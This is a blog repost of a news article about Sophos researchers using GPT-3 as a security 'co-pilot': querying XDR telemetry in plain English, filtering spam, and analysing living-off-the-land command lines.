Search This Blog

Powered by Blogger.

Blog Archive

Labels

How ChatGPT May Act as a Copilot for Security Experts

ChatGPT simplifies the analysis of living Off the land binaries, enhances spam filters, and quickly filters harmful behavior in XDR telemetry.

 

Security teams have been left to make assumptions about how generative AI will affect the threat landscape since ChatGPT-4 was released this week. Although it is now widely known that GPT-3 may be used to create malware and ransomware code, GPT-4 is 571X more potent, which could result in a large increase in threats. 

While the long-term effects of generative AI are yet unknown, a new study presented today by cybersecurity company Sophos reveals that GPT-3 can be used by security teams to thwart cyberattacks. 

Younghoo Lee, the principal data scientist for Sophos AI, and other Sophos researchers used the large language models from GPT-3 to create a natural language query interface for looking for malicious activity across the telemetry of the XDR security tool, detecting spam emails, and examining potential covert "living off the land" binary command lines. 

In general, Sophos' research suggests that generative AI has a crucial role to play in processing security events in the SOC, allowing defenders to better manage their workloads and identify threats more quickly. 

Detecting illegal activity 

The statement comes as security teams increasingly struggle to handle the volume of warnings generated by tools throughout the network, with 70% of SOC teams indicating that their work managing IT threat alerts is emotionally affecting their personal lives. 

According to Sean Gallagher, senior threat researcher at Sophos, one of the rising issues within security operation centres is the sheer amount of 'noise' streaming in. Many businesses are dealing with scarce resources, and there are just too many notifications and detections to look through. Using tools like GPT-3, we've demonstrated that it's possible to streamline some labor-intensive proxies and give defenders back vital time. 

Utilising ChatGPT as a cybersecurity co-pilot 

In the study, researchers used a natural language query interface where a security analyst may screen the data gathered by security technologies for harmful activities by typing queries in plain text English. 

For instance, the user may input a command like "show me all processes that were named powershelgl.exe and run by the root user" and produce XDR-SQL queries from them without having to be aware of the underlying database structure. 

This method gives defenders the ability to filter data without the usage of programming languages like SQL and offers a "co-pilot" to ease the effort of manually looking for threat data.

“We are already working on incorporating some of the prototypes into our products, and we’ve made the results of our efforts available on our GitHub for those interested in testing GPT-3 in their own analysis environments,” Gallagher stated. “In the future, we believe that GPT-3 may very well become a standard co-pilot for security experts.” 

It's important to note that researchers also discovered GPT-3 to filter threat data to be significantly more effective than utilising other substitute machine learning models. This would probably be faster with the upcoming version of generative AI given the availability of GPT-4 and its greater processing capabilities. Although these pilots are still in their early stages, Sophos has published the findings of the spam filtering and command line analysis experiments on the SophosAI GitHub website for other businesses to adapt.
Share it:

AI tools

Cyber Security

Cyberwarfare

IT Security

XDR Tools